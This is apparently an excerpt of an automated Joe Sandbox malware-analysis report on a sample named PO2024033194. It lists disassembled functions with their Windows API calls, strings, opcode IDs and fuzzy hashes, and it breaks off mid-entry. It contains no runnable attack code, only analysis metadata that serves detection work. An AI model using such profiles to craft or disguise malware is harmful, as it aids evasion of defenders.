                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyWindow
                                                                  • String ID: static
                                                                  • API String ID: 3375834691-2160076837
                                                                  • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                  • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                  • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                  • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                  Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                  • API String ID: 2907320926-3566645568
                                                                  • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                  • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                  • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                  • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                  Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                  • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                  • DeleteObject.GDI32(003D0000), ref: 00470A04
                                                                  • DestroyIcon.USER32(003A0043), ref: 00470A1C
                                                                  • DeleteObject.GDI32(AB306519), ref: 00470A34
                                                                  • DestroyWindow.USER32(006C0061), ref: 00470A4C
                                                                  • DestroyIcon.USER32(?), ref: 00470A73
                                                                  • DestroyIcon.USER32(?), ref: 00470A81
                                                                  • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 1237572874-0
                                                                  • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                  • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                  • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                  • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                  Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                  • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                  Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                  • GetKeyState.USER32(00000011), ref: 00444903
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                  Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                  • String ID:
                                                                  • API String ID: 3413494760-0
                                                                  • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                  • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                  • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                  • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                  Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                  • String ID: AU3_FreeVar
                                                                  • API String ID: 2634073740-771828931
                                                                  • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                  • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                  Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32 ref: 0046C63A
                                                                  • CoUninitialize.OLE32 ref: 0046C645
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                    • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                  • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                  • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                  • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 2294789929-1287834457
                                                                  • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                  • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                  • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                  • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                  Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                  • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                  • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                  • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                  • ReleaseCapture.USER32 ref: 0047116F
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                  • API String ID: 2483343779-2107944366
                                                                  • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                  • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                  • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                  • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                  Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                  • _wcslen.LIBCMT ref: 00450720
                                                                  • _wcscat.LIBCMT ref: 00450733
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                  • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat_wcslen
                                                                  • String ID: -----$SysListView32
                                                                  • API String ID: 4008455318-3975388722
                                                                  • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                  • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                  • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                  • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                  Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                  • GetParent.USER32 ref: 00469C98
                                                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                  • GetParent.USER32 ref: 00469CBC
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 2360848162-1403004172
                                                                  • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                  • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                  • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                  • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                  Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                  • String ID:
                                                                  • API String ID: 262282135-0
                                                                  • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                  • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                  • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                  • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                  Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 312131281-0
                                                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
